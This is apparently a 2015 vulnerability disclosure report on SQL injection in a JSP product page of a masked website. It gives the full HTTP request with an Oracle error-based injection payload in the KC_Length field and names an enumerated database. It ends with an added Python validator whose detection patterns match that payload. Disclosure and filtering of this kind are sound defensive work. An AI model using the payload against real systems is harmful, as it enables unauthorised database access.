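2015-10-14: Details reported to the vendor; awaiting vendor handling
2015-10-19: Vendor confirmed; details disclosed to the vendor only
2015-10-29: Details disclosed to core white hats and experts in related fields
2015-11-08: Details disclosed to regular white hats
2015-11-18: Details disclosed to intern white hats
2015-12-03: Details disclosed to the public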
As the title says.
1. Injection point
POST /cpzt/kcproduct.jsp?pros=3&where=3&Type=004004 HTTP/1.1
Cache-Control: no-cache
Referer: http://**.**.**.**/cpzt/kcproduct.jsp?where=&Type=004004&pros=
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
Host: **.**.**.**
Cookie: JSESSIONID=Q2JzWBKTD1DxnYZfwcVmYCvX7QQFgXvM3n5jwdGmyfwWw1myWVlv!1092529893
Accept-Encoding: gzip, deflate
Content-Length: 234
Content-Type: application/x-www-form-urlencoded

button=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)+from+DUAL))%7c%7c%27&KC_USE=1
2. Databases involved:
available databases [59]
3. Tables in one of the databases
Database: FAW_FWKC [55 tables]
As above.
Filter the input.
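One way to apply the recommended filtering to the reported request, as an added example that is not part of the original report. It assumes that button, KC_Length and KC_USE are small non-negative integers; the function names and the benign sample body are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Form body copied from the request in this report; everything else is constructed.
REPORTED_BODY = (
    "button=3&KC_Length=%27%7c%7cCTXSYS.DRITHSX.SN(user%2c(select+chr(95)"
    "%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)"
    "%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97)"
    "+from+DUAL))%7c%7c%27&KC_USE=1"
)
BENIGN_BODY = "button=3&KC_Length=12&KC_USE=1"  # constructed sample

# Assumption: all three fields carry small non-negative integers.
NUMERIC_FIELDS = {"button", "KC_Length", "KC_USE"}
DIGITS = re.compile(r"\d{1,6}")

# Oracle-specific patterns that label why a value was rejected (for logging).
INDICATORS = [
    ("quote-concat", re.compile(r"'\s*\|\|")),
    ("ctxsys-call", re.compile(r"\bCTXSYS\.DRITHSX\.SN\s*\(", re.I)),
    ("chr-chain", re.compile(r"chr\(\d+\)\s*\|\|\s*chr\(\d+\)", re.I)),
    ("subselect", re.compile(r"\(\s*select\b", re.I)),
]

def inspect_body(body):
    """Return {field: [reasons]} for every field that must be rejected."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        reasons = []
        # Allow-list check: a numeric field may contain digits only.
        if name in NUMERIC_FIELDS and not DIGITS.fullmatch(value):
            reasons.append("not-numeric")
        reasons += [label for label, rx in INDICATORS if rx.search(value)]
        if reasons:
            findings[name] = reasons
    return findings

def decode_chr_chain(value):
    """Rebuild the literal spelled out with chr(n)||chr(n)||... in a value."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", value, re.I))

if __name__ == "__main__":
    print(inspect_body(REPORTED_BODY))
    print(inspect_body(BENIGN_BODY))
    kc_length = dict(parse_qsl(REPORTED_BODY))["KC_Length"]
    print(decode_chr_chain(kc_length))
```

The allow-list check is what rejects the request; the indicator labels only help triage in logs. Input filtering complements bind variables in the query itself and does not replace them.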
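Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-10-19 08:47
No direct handling channel with the organization that manages the website has been established yet; awaiting claim.
None yet.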